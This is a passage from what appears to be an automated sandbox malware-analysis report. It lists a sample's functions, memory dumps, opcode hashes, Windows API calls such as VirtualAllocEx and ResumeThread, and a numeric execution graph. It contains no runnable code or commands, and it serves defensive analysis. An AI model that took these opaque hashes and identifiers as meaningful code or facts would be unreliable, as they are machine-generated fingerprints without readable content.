                                                        • Instruction ID: 30b6dca5acbf2eb55e93bc055791e530e74fea1442d948a6c6b236ed25ae7d35
                                                        • Opcode Fuzzy Hash: 0ee82cb3aefdd8befaeebcf25388732be8e62caa8a36f7c6b3a724ff9555d8f8
                                                        • Instruction Fuzzy Hash: 591103B6D002089FDB20DF9AD444B9EFBF5AB88314F10842EE819A7240C3B5A545CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A567F0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A5685E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 04377a2c531a6fd6fbd1c6e701860a436f02716532cf65b9821000592bdb138f
                                                        • Instruction ID: e4e190358c1210037c0046db8433a688cb854223bfa39af13d40919af1b62aa2
                                                        • Opcode Fuzzy Hash: 04377a2c531a6fd6fbd1c6e701860a436f02716532cf65b9821000592bdb138f
                                                        • Instruction Fuzzy Hash: 1B115672C002089FDF20DFAAC844BDEBBF5EB48310F10841AE915A7250C7759500CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A5622B Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 7016de74b4e48133cf4038b2821c1b8289bfa9f22a2dec02e52600e61d40c4fd
                                                        • Instruction ID: 164dbbe082019ab6f279e0747b6e644332fad834fe2feddfd129b0e7b722b5a2
                                                        • Opcode Fuzzy Hash: 7016de74b4e48133cf4038b2821c1b8289bfa9f22a2dec02e52600e61d40c4fd
                                                        • Instruction Fuzzy Hash: D41158B1C043488FDB24DFAAC8457DEFBF4AF88224F14881ED419A7640C779A540CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A5ADB9 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A5AE1D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 889fbc25abeb513773b2614540d1a4017968f537738f4bdf75c6657eaa2b934e
                                                        • Instruction ID: 675faa932462822d0d219184a491940bdd14632c83821f02be110df3e2424fa3
                                                        • Opcode Fuzzy Hash: 889fbc25abeb513773b2614540d1a4017968f537738f4bdf75c6657eaa2b934e
                                                        • Instruction Fuzzy Hash: 7E1103B5C003599FDB10DF9AD885BDFBBF8EB48314F10841AEA58A7241C379A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A56230 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 428f3da6d9859b3f6b933bdb20d002bf720952130d3a069cb8993e52a42e957e
                                                        • Instruction ID: 80e06f9be685de521ba19ed235d3749b3946f32b05edda3016cb6ae266f0c6df
                                                        • Opcode Fuzzy Hash: 428f3da6d9859b3f6b933bdb20d002bf720952130d3a069cb8993e52a42e957e
                                                        • Instruction Fuzzy Hash: 47113AB1D003488FDB24DFAAC4457DEFBF5AF88214F14841ED419A7640C7796540CBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A5A730 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06A5AE1D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 265f9e216ce7336c6ca437ff943af0a3ceb9c63e1800b28836ddf40b659b888a
                                                        • Instruction ID: 30fbf396f29c7e8a83e47b1c4189133de51d98081391a0486dc694eaf55b367d
                                                        • Opcode Fuzzy Hash: 265f9e216ce7336c6ca437ff943af0a3ceb9c63e1800b28836ddf40b659b888a
                                                        • Instruction Fuzzy Hash: 0E1103B5D043599FDB20DF9AD845BDEBBF8EB48310F10841AE958A7301C375A944CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04C8D938 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 04C8D99E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1252359056.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: d4dbf2e80c469921fce36f1ddc6f8a106b66211f0436056f458294e3adab2957
                                                        • Instruction ID: eeff29ff451005f1bc9a626b51cee63d2338487b4d91acd3e8d4fef7a163ab11
                                                        • Opcode Fuzzy Hash: d4dbf2e80c469921fce36f1ddc6f8a106b66211f0436056f458294e3adab2957
                                                        • Instruction Fuzzy Hash: 5A110FB6C002498FDB20DF9AC444BDEFBF5AB88318F10846AD859A7240C379A645CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025AD4C4 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1247087998.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_25ad000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 255563a4e8f81d4d6a2887ba5b49e0ebc90fa235bc385e35da8378128841bf56
                                                        • Instruction ID: 7ea3a1da56a00dbb6d5ccbb2e57abeb438e1e2a99628b2c1c0b27862e5d0561f
                                                        • Opcode Fuzzy Hash: 255563a4e8f81d4d6a2887ba5b49e0ebc90fa235bc385e35da8378128841bf56
                                                        • Instruction Fuzzy Hash: 3C214571900200EFDB14EF10D9C1B2ABFB1FB88318F20C569E8090BA56C336D846CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025BD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1247333886.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_25bd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3e2d0db51ae93c2cc5287eebc9d74448adc1e8ef8163302c5f82ff5051a979d
                                                        • Instruction ID: fa8b046e25477ec5e6012bab31a45eeb1451f5c073ca83a597311de64cb5d402
                                                        • Opcode Fuzzy Hash: a3e2d0db51ae93c2cc5287eebc9d74448adc1e8ef8163302c5f82ff5051a979d
                                                        • Instruction Fuzzy Hash: DD210375505208DFDB15DF20D580B66BBB1FF84314F20C969E80A0B242D33AD447CA65
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025BD006 Relevance: .1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1247333886.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_25bd000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da9f9e3fd86cf80638ca288511f0b020689745985798e7d335fe62abb84768cf
                                                        • Instruction ID: 3d47a6b2b25b914b715995cb298bc154f5d7653d01bd7ee47009d1ccded4c44d
                                                        • Opcode Fuzzy Hash: da9f9e3fd86cf80638ca288511f0b020689745985798e7d335fe62abb84768cf
                                                        • Instruction Fuzzy Hash: 7C214C755093848FCB12CF24D994755BF71FF46214F28C5DAD8498B6A7C33A980ACB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 025AD4BF Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1247087998.00000000025AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_25ad000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                        • Instruction ID: ca6a71e85fcdf4de0d89f60290a7683da7b30313c10e6732995408714f13cd4e
                                                        • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                        • Instruction Fuzzy Hash: 8F11D376504280CFCB15DF10D5C4B1ABF71FB88318F24C6A9D8490BA56C33AD856CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 06A5CC48 Relevance: .4, Instructions: 357COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ad7d182ee781e1c9e3c85614d9f6de536171aad1a777b299914b0b38b7e14d7
                                                        • Instruction ID: f8a85fa6173f08f2175ccdfea7ae8eadf28cf1149d5e8c1a2e1725a13420e199
                                                        • Opcode Fuzzy Hash: 4ad7d182ee781e1c9e3c85614d9f6de536171aad1a777b299914b0b38b7e14d7
                                                        • Instruction Fuzzy Hash: 53D19931A003008FEB95EB75C8507AEBBF7AF89614F15846EDA47CB294DB35E902CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A53DD0 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b542097e4d4234412fbb469af6dbbcd526fccd48f1d1a5455bec5f9c19dc6c5d
                                                        • Instruction ID: 3a988c45824a0297b1fbacbe7b27e98cfa732dc9cdbf9f53fb2db9717cbce210
                                                        • Opcode Fuzzy Hash: b542097e4d4234412fbb469af6dbbcd526fccd48f1d1a5455bec5f9c19dc6c5d
                                                        • Instruction Fuzzy Hash: 09E1F574E002598FDB54DFA9C580AAEFBF2FF89304F248169D815AB355D734A941CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A54208 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 57709bce717cbbd05cdfda0c6170c389a2f00c6828604dd65a1eb5b8d1980423
                                                        • Instruction ID: 4b19a472ebc76e36b8396d8ebd4b70ef8bd4a4f86277a3093f72301bd57dc05a
                                                        • Opcode Fuzzy Hash: 57709bce717cbbd05cdfda0c6170c389a2f00c6828604dd65a1eb5b8d1980423
                                                        • Instruction Fuzzy Hash: 52E1E674E002598FDB14DFA9C580AAEFBF2FF89304F258169D914AB355D730A981DFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A55A08 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e2b3b936d28d2ba768187416bc02b5008faef57e18ff65cc4969b92edf8b472
                                                        • Instruction ID: 82ede907e3dbd1262c1c0dda9bf7dd576d56fc825d944ea7f804106054158fb3
                                                        • Opcode Fuzzy Hash: 6e2b3b936d28d2ba768187416bc02b5008faef57e18ff65cc4969b92edf8b472
                                                        • Instruction Fuzzy Hash: B3E10774E002598FDB54DFA9C584AAEFBF2FF89304F258169D814AB356D730A941CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A563B8 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bbd2743c513e555a90725f9e5a6fc908763042485ad1c928c3f0702fb3d2dbf
                                                        • Instruction ID: 21a603142454f7eef2afb76b77bd85ce9e43333f722b96fd60356f4ff5048b1a
                                                        • Opcode Fuzzy Hash: 8bbd2743c513e555a90725f9e5a6fc908763042485ad1c928c3f0702fb3d2dbf
                                                        • Instruction Fuzzy Hash: CCE1E974E002598FDB14DFA9C590AAEFBF2FF89304F648169D814AB35AD731A941CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A53998 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 27e68d3ad0bfd9d80a59348b1683af301c7ef271818b983c426ce58be9362656
                                                        • Instruction ID: e217d2650e55c134d92bda71348005d9496926a7e18ac08d38290baeec7ba5f7
                                                        • Opcode Fuzzy Hash: 27e68d3ad0bfd9d80a59348b1683af301c7ef271818b983c426ce58be9362656
                                                        • Instruction Fuzzy Hash: 25E11774E002598FDB14DFA9C590AAEFBF2FF89344F258169D804AB356D730A941CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A59D23 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 598993d150e940ed0655d0b0075ff81de25fc2993edb78f9c6242527132f2fe2
                                                        • Instruction ID: b36f7196f8fabf3de91861ac594b7ad36655c49fb806d3eb9d7b66135e33d6ec
                                                        • Opcode Fuzzy Hash: 598993d150e940ed0655d0b0075ff81de25fc2993edb78f9c6242527132f2fe2
                                                        • Instruction Fuzzy Hash: 2BF01C38E5D2448FDBA1DFD4E4594F8BBB8EB4F211F0621E6DA0E97212CB305596CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06A5A3FF Relevance: .0, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1254531433.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6a50000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c1a5255df109a5c65a548ef299ad31d53547ae95f7d569f387ef92627bde936
                                                        • Instruction ID: 21473efadd1a31afabebf533fc3b84c7345c264cf874b606722da4dda14682f5
                                                        • Opcode Fuzzy Hash: 5c1a5255df109a5c65a548ef299ad31d53547ae95f7d569f387ef92627bde936
                                                        • Instruction Fuzzy Hash: 9AE01A39E1D104CFDB90AEE4F45D1F8BBB8EB0A212F0521A19A0E93201CB304A518EA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:11.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:93
                                                        Total number of Limit Nodes:7
                                                        execution_graph 30295 6c09c38 30296 6c09c7e GlobalMemoryStatusEx 30295->30296 30297 6c09cae 30296->30297 30251 6c0c24a 30252 6c0c250 GetModuleHandleW 30251->30252 30254 6c0c2c5 30252->30254 30255 12ed044 30256 12ed05c 30255->30256 30257 12ed0b6 30256->30257 30263 6c0d5d0 30256->30263 30267 6c0b30a 30256->30267 30271 6c0b374 30256->30271 30275 6c0d4a2 30256->30275 30279 6c0d4b0 30256->30279 30264 6c0d5e0 30263->30264 30283 6c0b3ac 30264->30283 30266 6c0d5e7 30266->30257 30268 6c0b30d 30267->30268 30269 6c0b3ac GetModuleHandleW 30268->30269 30270 6c0d5e7 30269->30270 30270->30257 30272 6c0b379 30271->30272 30273 6c0b3ac GetModuleHandleW 30272->30273 30274 6c0d5e7 30273->30274 30274->30257 30276 6c0d4b0 30275->30276 30277 6c0b374 GetModuleHandleW 30276->30277 30278 6c0d4e2 30277->30278 30278->30257 30280 6c0d4d6 30279->30280 30281 6c0b374 GetModuleHandleW 30280->30281 30282 6c0d4e2 30281->30282 30282->30257 30284 6c0b3b7 30283->30284 30286 6c0d6b7 30284->30286 30287 6c0b250 30284->30287 30288 6c0c250 GetModuleHandleW 30287->30288 30290 6c0c2c5 30288->30290 30290->30286 30298 1330b4d 30299 1330b55 30298->30299 30301 133084e 30298->30301 30300 133091b 30301->30298 30301->30300 30304 1331380 30301->30304 30311 133148b 30301->30311 30305 1331363 30304->30305 30307 133138b 30304->30307 30305->30301 30306 1331480 30306->30301 30307->30306 30310 133148b 2 API calls 30307->30310 30317 6c0a660 30307->30317 30321 6c0a653 30307->30321 30310->30307 30313 1331396 30311->30313 30312 1331480 30312->30301 30313->30312 30314 6c0a660 2 API calls 30313->30314 30315 6c0a653 2 API calls 30313->30315 30316 133148b 2 API calls 30313->30316 30314->30313 30315->30313 30316->30313 30318 6c0a672 30317->30318 30320 6c0a6e9 30318->30320 30325 6c0a294 30318->30325 30320->30307 30322 6c0a672 30321->30322 30323 6c0a294 2 API calls 30322->30323 30324 6c0a6e9 30322->30324 30323->30324 30324->30307 30326 6c0a29f 30325->30326 30330 6c0b820 30326->30330 30338 6c0b80b 30326->30338 30327 6c0a8c2 30327->30320 30331 6c0b84b 30330->30331 30346 6c0bd91 30331->30346 30332 6c0b8ce 30333 6c0b250 GetModuleHandleW 30332->30333 30335 6c0b8fa 30332->30335 30334 6c0b93e 30333->30334 30334->30335 30337 6c0d2ee CreateWindowExW 30334->30337 30337->30335 30339 6c0b820 30338->30339 30344 6c0bd91 GetModuleHandleW 30339->30344 30340 6c0b8ce 30341 6c0b250 GetModuleHandleW 30340->30341 30343 6c0b8fa 30340->30343 30342 6c0b93e 30341->30342 30342->30343 30358 6c0d2ee 30342->30358 30344->30340 30347 6c0bdcd 30346->30347 30348 6c0be4e 30347->30348 30350 6c0bf6f 30347->30350 30351 6c0bf7a 30350->30351 30352 6c0b250 GetModuleHandleW 30351->30352 30353 6c0c09a 30352->30353 30354 6c0b250 GetModuleHandleW 30353->30354 30355 6c0c114 30353->30355 30356 6c0c0e8 30354->30356 30355->30348 30356->30355 30357 6c0b250 GetModuleHandleW 30356->30357 30357->30355 30359 6c0d2bb 30358->30359 30359->30358 30360 6c0d3bb CreateWindowExW 30359->30360 30361 6c0d2dd 30359->30361 30362 6c0d41c 30360->30362 30361->30343 30291 72f0040 30294 72f00a5 30291->30294 30292 72f0508 WaitMessage 30292->30294 30293 72f00f2 30294->30292 30294->30293

                                                        Executed Functions

                                                        Function 0133A2E3 Relevance: 2.8, Instructions: 2821COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e754107e1d10cc506523398e48a97056d3c2df8ff13da06fc20ffa51271392a3
                                                        • Instruction ID: d3f57a3df3b3ae91ccd299673bf3e43db8888b4bc1e28e20f7758cc640c90e42
                                                        • Opcode Fuzzy Hash: e754107e1d10cc506523398e48a97056d3c2df8ff13da06fc20ffa51271392a3
                                                        • Instruction Fuzzy Hash: 8A63F831D10B1A8EDB51EB68C880AA9F7B1FF99310F55D79AE44877121EB70AAC4CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 072F0040 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1257 72f0040-72f00a3 1258 72f00a5-72f00cf 1257->1258 1259 72f00d2-72f00f0 1257->1259 1258->1259 1264 72f00f9-72f0130 1259->1264 1265 72f00f2-72f00f4 1259->1265 1269 72f0136-72f014a 1264->1269 1270 72f0561 1264->1270 1266 72f05b2-72f05c7 1265->1266 1271 72f014c-72f0176 1269->1271 1272 72f0179-72f0198 1269->1272 1273 72f0566-72f057c 1270->1273 1271->1272 1279 72f019a-72f01a0 1272->1279 1280 72f01b0-72f01b2 1272->1280 1273->1266 1281 72f01a4-72f01a6 1279->1281 1282 72f01a2 1279->1282 1283 72f01b4-72f01cc 1280->1283 1284 72f01d1-72f01da 1280->1284 1281->1280 1282->1280 1283->1273 1286 72f01e2-72f01e9 1284->1286 1287 72f01eb-72f01f1 1286->1287 1288 72f01f3-72f01fa 1286->1288 1289 72f0207-72f0224 1287->1289 1290 72f01fc-72f0202 1288->1290 1291 72f0204 1288->1291 1293 72f022a-72f0231 1289->1293 1294 72f0379-72f037d 1289->1294 1290->1289 1291->1289 1293->1270 1295 72f0237-72f0274 1293->1295 1296 72f054c-72f055f 1294->1296 1297 72f0383-72f0387 1294->1297 1305 72f027a-72f027f 1295->1305 1306 72f0542-72f0546 1295->1306 1296->1273 1298 72f0389-72f039c 1297->1298 1299 72f03a1-72f03aa 1297->1299 1298->1273 1301 72f03ac-72f03d6 1299->1301 1302 72f03d9-72f03e0 1299->1302 1301->1302 1303 72f047f-72f0494 1302->1303 1304 72f03e6-72f03ed 1302->1304 1303->1306 1315 72f049a-72f049c 1303->1315 1307 72f03ef-72f0419 1304->1307 1308 72f041c-72f043e 1304->1308 1309 72f02b1-72f02c4 1305->1309 1310 72f0281-72f028f 1305->1310 1306->1286 1306->1296 1307->1308 1308->1303 1338 72f0440-72f044a 1308->1338 1313 72f02cb-72f02cf 1309->1313 1310->1309 1323 72f0291-72f02af 1310->1323 1319 72f02d1-72f02e3 1313->1319 1320 72f0340-72f034d 1313->1320 1321 72f049e-72f04d7 1315->1321 1322 72f04e9-72f0506 1315->1322 1343 72f02e5-72f0315 1319->1343 1344 72f0323-72f033b 1319->1344 1320->1306 1332 72f0353-72f035d 1320->1332 1334 72f04d9-72f04df 1321->1334 1335 72f04e0-72f04e7 1321->1335 1322->1306 1337 72f0508-72f0534 WaitMessage 1322->1337 1323->1313 1346 72f035f-72f0367 1332->1346 1347 72f036c-72f0374 1332->1347 1334->1335 1335->1306 1340 72f053b 1337->1340 1341 72f0536 1337->1341 1349 72f044c-72f0452 1338->1349 1350 72f0462-72f0465 1338->1350 1340->1306 1341->1340 1356 72f031c 1343->1356 1357 72f0317 1343->1357 1344->1273 1346->1306 1347->1306 1354 72f0456-72f0458 1349->1354 1355 72f0454 1349->1355 1358 72f046e-72f047d 1350->1358 1354->1350 1355->1350 1356->1344 1357->1356 1358->1303 1358->1338
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3712694551.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_72f0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f650f161dc05edbbd92f931dd3fb4c18f46f8e60bf30ccf450eb56cfb52cfd2
                                                        • Instruction ID: e9b918ac9916120662fd2e0f586877a5f802dcf2c53e807584e148b2d003c555
                                                        • Opcode Fuzzy Hash: 3f650f161dc05edbbd92f931dd3fb4c18f46f8e60bf30ccf450eb56cfb52cfd2
                                                        • Instruction Fuzzy Hash: 63F15DB0A1020ACFEB24DFA5C944BADFBF1BF48314F158169E505AF396DBB0A945CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013341C8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: 855820848abd1f8682a578bc46c6ecc081547d8ef5c62eefb93a88347a681067
                                                        • Instruction ID: 5f859a399668b4eab16c8a96eb4dc020a861e7dede21ffc1447e5a37c15ccd31
                                                        • Opcode Fuzzy Hash: 855820848abd1f8682a578bc46c6ecc081547d8ef5c62eefb93a88347a681067
                                                        • Instruction Fuzzy Hash: 3AB13E71E00209CFEF14CFA9D88579DBBF2BF88318F148529E815E7294EB749845CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01333E80 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.3699048013.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_1330000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V/k
                                                        • API String ID: 0-13811129
                                                        • Opcode ID: 24953e108a625fa4f47076e1dbcd8d60c8250f8bff7010fca5150f02e1500814
                                                        • Instruction ID: 2a470e5994c71be346b25084ee395d741e6a634b98f87479de4a8b64fc771c80
                                                        • Opcode Fuzzy Hash: 24953e108a625fa4f47076e1dbcd8d60c8250f8bff7010fca5150f02e1500814
                                                        • Instruction Fuzzy Hash: 0D914C70E007099FDF24CFA9D98579EFBF2BF88318F148129E415A7254DB749846CB85
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01334A98 Relevance: .3, Instructions: 266COMMON
